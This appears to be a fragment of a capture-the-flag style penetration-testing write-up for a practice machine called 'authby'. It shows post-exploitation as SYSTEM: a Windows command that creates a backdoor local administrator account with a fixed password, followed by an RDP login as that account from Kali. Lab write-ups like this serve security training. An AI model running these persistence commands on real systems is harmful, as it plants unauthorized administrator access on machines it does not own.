Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM
after compromising the target system via token impersonation and kernel exploit
C:\Windows\system32> net user /ADD adm1n Qwer1234 && net localgroup administrators /ADD adm1n
The command completed successfully.
The command completed successfully.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/authby]
└─$ xfreerdp /u:adm1n /p:'Qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0
RDP
Web
FTP